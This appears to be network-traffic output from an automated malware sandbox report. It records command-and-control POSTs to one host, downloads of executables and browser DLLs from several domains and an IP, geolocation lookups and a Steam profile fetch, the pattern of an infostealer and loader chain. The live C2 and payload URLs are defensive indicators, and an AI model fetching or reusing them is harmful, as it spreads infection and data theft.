            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxllolfqvkh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://apkbthcutmq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xkocmvnipxqqfup.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygytcnantfux.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://awayqydmiytmar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwhaihbnyhyxnnhu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcuhrqgapjbmm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scsrfrjxtrigj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xplinqkvhni.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdgpndakpxadhnb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpudkoaipgmn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lvxpewpgqyblpfqc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anwvnbknhlqgd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbrnvdnfmew.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbrnvdnfmew.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: trad-einmyus.comData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8c 66 5d 02 c8 a1 c1 64 3c bf b9 19 27 d4 70 77 b9 06 74 58 58 48 9f e6 bb 2c b1 b0 af d7 39 59 53 2f 5a c5 6b 46 ae 13 0c 61 64 9a 2a 97 bf 78 ca 1b 6c 48 52 a8 f8 5a 38 76 d2 3f 8f a7 5e 14 df ff 3d ab 54 3e 11 d9 76 d6 77 b6 84 f4 d8 98 43 c5 24 a2 7e Data Ascii: k9w4yBD1^h}k\Fu$f]d<'pwtXXH,9YS/ZkFad*xlHRZ8v?^=T>vwC$~
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbrnvdnfmew.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: trad-einmyus.comData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8c 66 5d 02 c8 a1 c1 64 3c bf b9 19 27 d4 70 77 b9 06 74 58 58 48 9f e6 bb 2c b1 b0 af d7 39 59 53 2f 5a c5 6b 46 ae 13 0c 61 64 9a 2a 97 bf 78 ca 1b 6c 48 52 a8 f8 5a 38 76 d2 3f 8f a7 5e 14 df ff 3d ab 54 3e 11 d9 76 d6 77 b6 84 f4 d8 98 43 c5 24 a2 7e Data Ascii: k9w4yBD1^h}k\Fu$f]d<'pwtXXH,9YS/ZkFad*xlHRZ8v?^=T>vwC$~
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yfuerexislgu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upixukbaggkkpn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nksopmxhnnxiata.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://arvbscjewhsui.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://msmrjqievyxvat.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sswicaghdws.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xueylbuhcqkh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ywbvdqwewtk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ywbvdqwewtk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: trad-einmyus.comData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 84 66 5d 02 c8 a1 c1 64 3e 96 8b 23 25 de 56 60 d7 76 13 05 04 79 ad 97 c9 6f c4 ca ad f5 11 4a 0b 06 75 88 7b 43 f7 13 24 75 06 cc 18 ee b7 6a a5 4f 2c 27 5a a6 ad 4e 4c 48 ac 30 9e ca 7d 13 d9 b6 51 8e 07 40 3a ef 27 fd 4f ad b6 da f7 c8 47 9e 57 94 5d 79 14 67 5b 8d 4c 9c dd 23 cc d4 72 a9 a2 62 49 13 9f b1 d8 ee 8c 13 7e a3 da f9 c7 f1 25 52 ab 8d ec b0 36 58 23 11 5b b0 f8 25 74 49 df 8c 9a 7a f0 68 16 3a 81 14 4c bd c1 49 d3 70 a4 58 d4 ff 15 36 ec 70 86 81 80 74 ba ad 77 07 ce 53 28 88 d8 e5 d8 1d c2 85 3e 70 df 6c e8 b6 0f 4b cf a3 73 a6 52 87 38 78 71 5c 9d ea 67 2b 32 c8 8c 6b 1b 6d 46 25 08 Data Ascii: k9w4yBD1^h}k\Fu$f]d>#%V`vyoJu{C$ujO,'ZNLH0}Q@:'OGW]yg[L#rbI~%R6X#[%tIzh:LIpX6ptwS(>plKsR8xq\g+2kmF%
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ywbvdqwewtk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: trad-einmyus.comData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 84 66 5d 02 c8 a1 c1 64 3e 96 8b 23 25 de 56 60 d7 76 13 05 04 79 ad 97 c9 6f c4 ca ad f5 11 4a 0b 06 75 88 7b 43 f7 13 24 75 06 cc 18 ee b7 6a a5 4f 2c 27 5a a6 ad 4e 4c 48 ac 30 9e ca 7d 13 d9 b6 51 8e 07 40 3a ef 27 fd 4f ad b6 da f7 c8 47 9e 57 94 5d 79 14 67 5b 8d 4c 9c dd 23 cc d4 72 a9 a2 62 49 13 9f b1 d8 ee 8c 13 7e a3 da f9 c7 f1 25 52 ab 8d ec b0 36 58 23 11 5b b0 f8 25 74 49 df 8c 9a 7a f0 68 16 3a 81 14 4c bd c1 49 d3 70 a4 58 d4 ff 15 36 ec 70 86 81 80 74 ba ad 77 07 ce 53 28 88 d8 e5 d8 1d c2 85 3e 70 df 6c e8 b6 0f 4b cf a3 73 a6 52 87 38 78 71 5c 9d ea 67 2b 32 c8 8c 6b 1b 6d 46 25 08 Data Ascii: k9w4yBD1^h}k\Fu$f]d>#%V`vyoJu{C$ujO,'ZNLH0}Q@:'OGW]yg[L#rbI~%R6X#[%tIzh:LIpX6ptwS(>plKsR8xq\g+2kmF%
            Source: global trafficHTTP traffic detected: GET /osminogs.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: m2reg.ulm.ac.id
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdsqoggpfrmafq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pdvtvvujfpykxl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://flxeggavyom.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rdeutjvmtpeybn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://svcrlgovfyqyxld.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbkechetmnnrcdik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nldnpyxotgr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://maghsaqdhdw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vougeeiwtdhw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://freqadqrkclin.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uxxyleynxaf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjcrkcgcbfgpa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://poplxshctilgi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cjbcpvchovjhab.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://myghbxnpjrq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbtcjwrtgvaph.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://howwnamvvlywf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wyuccaycqhmwcb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwcftddidtvatlv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rqpbkpdpqtpulcwg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://exmgwmmbekxckvpr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: trad-einmyus.com
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,12_2_0040CF10
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
            Source: global trafficHTTP traffic detected: GET /file/d/1Qqy-57DLmiipUvNEOUGrNV3pL-1VKzB_/view?usp=sharing HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.com
            Source: global trafficHTTP traffic detected: GET /e0cbefcb1af40c7d4aff4aca26621a98.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: jennyilis.com
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /2b7fa37605b0ad5f1a14cbc68bbdca6f/e0cbefcb1af40c7d4aff4aca26621a98.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kilperdoper.com
            Source: global trafficHTTP traffic detected: GET /attachments/1079752687278628966/1218325194725265428/Fupyivruk.exe?ex=660740c1&is=65f4cbc1&hm=fd820d24e53345690281599b22ef3adb9ee8518e9dbf6fb23e9b0949a35af707& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
            Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
            Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sajdfue.com
            Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sajdfue.com
            Source: global trafficHTTP traffic detected: GET /osminogs.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: m2reg.ulm.ac.id
            Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sajdfue.com
